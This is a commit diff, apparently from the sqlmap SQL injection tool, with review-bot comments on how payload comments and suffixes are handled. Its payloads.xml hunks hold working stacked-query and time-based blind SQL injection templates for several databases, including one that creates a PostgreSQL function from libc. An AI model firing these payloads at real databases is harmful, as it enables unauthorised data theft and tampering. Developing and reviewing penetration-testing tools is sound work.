
Commit 687f399

Cleaning/refactoring of a bunch of stacked/suffix/comment stuff (e.g.
1 parent 6bc5f44 commit 687f399

6 files changed

+47
-45
lines changed


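--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -500,7 +500,7 @@ def genCmpPayload():
 injection.os = Backend.setOs(dValue)
 
 if vector is None and "vector" in test and test.vector is not None:
-vector = "%s%s" % (test.vector, comment or "")
+vector = test.vector
 
 injection.data[stype] = AttribDict()
 injection.data[stype].title = title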
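Review bot: The new line keeps the bare `test.vector`, so the comment that used to be folded into the vector must now reach `injection.data[stype].comment` by some other assignment, and this hunk only shows `.title` being set below it. The formatter in controller.py in this same commit reads `sdata.comment` unconditionally, so if that field is never stored the report gets whatever AttribDict returns for an unknown key (I cannot see its behaviour here). Unless it is already assigned in the lines that follow, I would add `injection.data[stype].comment = comment` right after `injection.data[stype].title = title`. The enclosing function starts and ends outside this hunk.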

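--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -128,12 +128,15 @@ def __formatInjection(inj):
 for stype, sdata in inj.data.items():
 title = sdata.title
 vector = sdata.vector
+comment = sdata.comment
 if stype == PAYLOAD.TECHNIQUE.UNION:
 count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
 title = re.sub(r"\d+ to \d+", str(count), title)
 vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
 if count == 1:
 title = title.replace("columns", "column")
+elif comment:
+vector = "%s%s" % (vector, comment)
 data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
 data += " Title: %s\n" % title
 data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload)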
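Review bot: Because the comment is appended in an `elif`, a UNION vector is reported without its comment even when `sdata.comment` is set, which is an asymmetry with every other technique that the hunk leaves unexplained. If `forgeInbandQuery` is expected to handle the terminator for UNION, a one-line note such as `# UNION vectors get their comment from forgeInbandQuery` would save the next reader the question; if not, the append belongs after the if/elif so both paths agree. `sdata.comment` is also read without a fallback, so an injection restored from a session saved before this change may not carry the key, something like `comment = getattr(sdata, "comment", None)` would be safer (whether AttribDict already tolerates a missing key is not visible here). The function continues past the end of the hunk.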

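--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -189,25 +189,26 @@ def suffixQuery(self, expression, comment=None, suffix=None, where=None):
 
 expression = self.cleanupPayload(expression)
 
-# User supplied --suffix nullifies any eventual payload comments
-comment = None if conf.suffix is not None and suffix == conf.suffix else comment
+# Take default values if None
+suffix = kb.injection.suffix if kb.injection and suffix is None else suffix
+
+if kb.technique and kb.technique in kb.injection.data:
+where = kb.injection.data[kb.technique].where if where is None else where
+comment = kb.injection.data[kb.technique].comment if comment is None else comment
 
 if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT:
 comment = "%00"
 
 if comment is not None:
 expression += comment
 
-if where is None and kb.technique and kb.technique in kb.injection.data:
-where = kb.injection.data[kb.technique].where
-
 # If we are replacing (<where>) the parameter original value with
 # our payload do not append the suffix
 if where == PAYLOAD.WHERE.REPLACE:
 pass
 
-elif any([kb.injection.suffix, suffix]) and not (comment and not conf.suffix):
-expression += " %s" % (kb.injection.suffix or suffix)
+elif suffix and not comment:
+expression += " %s" % suffix
 
 return re.sub(r"(?s);\W*;", ";", expression)
 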
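Review bot: `elif suffix and not comment:` now discards the suffix whenever the payload carries a comment, which inverts the rule the hunk removes, where an explicit `--suffix` won and the comment was nullified; assuming `kb.injection.suffix` is where `conf.suffix` ends up (not visible here), a test with `<comment>--</comment>` will silently ignore the user's suffix. I would restore the precedence by putting back, before `if comment is not None:`, the line `comment = None if conf.suffix is not None and suffix == conf.suffix else comment`, so the explicit suffix still suppresses the payload comment. Separately, the new `if kb.technique and kb.technique in kb.injection.data:` dereferences `kb.injection` even though the line just above guards against it being None; `if kb.injection and kb.technique and kb.technique in kb.injection.data:` keeps the two lines consistent (the old code had the same unguarded access, so this is not a regression). The method signature sits on the hunk header line, above the shown lines.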

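--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -466,9 +466,8 @@ def goStacked(expression, silent=False):
 if conf.direct:
 return direct(expression)
 
-comment = queries[Backend.getIdentifiedDbms()].comment.query
 query = agent.prefixQuery(";%s" % expression)
-query = agent.suffixQuery(query, comment)
+query = agent.suffixQuery(query)
 payload = agent.payload(newValue=query)
 Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)
 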
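Review bot: goStacked no longer picks the statement terminator itself; after this change it depends on `kb.technique` pointing at an injection entry whose `comment` suits a stacked `;...` statement, and nothing in the hunk establishes that the stacked technique is the current one when this is called. If the caller always selects the stacked technique first, a short comment on the `suffixQuery` line, `# comment/suffix come from kb.injection.data[kb.technique] (stacked technique must be current)`, would make the dependency explicit; if it does not, the per-DBMS `queries[...].comment.query` the hunk removes was the safer default and could be passed as a fallback. The function starts above the hunk.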

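--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@@ -71,9 +71,8 @@ def dnsUse(payload, expression):
 expressionUnescaped = unescaper.unescape(expressionRequest)
 
 if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
-comment = queries[Backend.getIdentifiedDbms()].comment.query
 query = agent.prefixQuery("; %s" % expressionUnescaped)
-query = agent.suffixQuery(query, comment)
+query = agent.suffixQuery(query)
 forgedPayload = agent.payload(newValue=query)
 else:
 forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))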

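--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1072,13 +1072,13 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</vector>
+<vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</vector>
 <request>
-<payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</payload>
+<payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</payload>
 <comment>#</comment>
 </request>
 <response>
-<comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</comparison>
+<comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</comparison>
 </response>
 <details>
 <dbms>MySQL</dbms>
@@ -1092,13 +1092,13 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</vector>
+<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
 <request>
-<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</payload>
+<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
 <comment>--</comment>
 </request>
 <response>
-<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</comparison>
+<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
 </response>
 <details>
 <dbms>Microsoft SQL Server</dbms>
@@ -1114,13 +1114,13 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>2</where>
-<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</vector>
+<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
 <request>
-<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</payload>
+<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
 <comment>--</comment>
 </request>
 <response>
-<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</comparison>
+<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
 </response>
 <details>
 <dbms>PostgreSQL</dbms>
@@ -1969,9 +1969,9 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);</vector>
+<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
 <request>
-<payload>; SELECT SLEEP([SLEEPTIME]);</payload>
+<payload>; SELECT SLEEP([SLEEPTIME])</payload>
 <comment>-- </comment>
 </request>
 <response>
@@ -1990,9 +1990,9 @@ Formats:
 <risk>2</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);</vector>
+<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
 <request>
-<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));</payload>
+<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
 <comment>-- </comment>
 </request>
 <response>
@@ -2010,9 +2010,9 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
+<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>; SELECT PG_SLEEP([SLEEPTIME]);</payload>
+<payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -2031,9 +2031,9 @@ Formats:
 <risk>2</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END);</vector>
+<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000);</payload>
+<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -2051,9 +2051,9 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
+<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);</payload>
+<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -2073,9 +2073,9 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';</vector>
+<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
 <request>
-<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]';</payload>
+<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -2095,9 +2095,9 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL;</vector>
+<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
 <request>
-<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL;</payload>
+<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -2115,9 +2115,9 @@ Formats:
 <risk>2</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL;</vector>
+<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
 <request>
-<payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5;</payload>
+<payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -2135,9 +2135,9 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
+<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
 <request>
-<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;</payload>
+<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -2155,9 +2155,9 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END;</vector>
+<vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
 <request>
-<payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END;</payload>
+<payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -2175,9 +2175,9 @@ Formats:
 <risk>2</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END);</vector>
+<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))));</payload>
+<payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -2196,9 +2196,9 @@ Formats:
 <risk>2</risk>
 <clause>0</clause>
 <where>1</where>
-<vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE;</vector>
+<vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE</vector>
 <request>
-<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;</payload>
+<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3</payload>
 <comment>--</comment>
 </request>
 <response>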
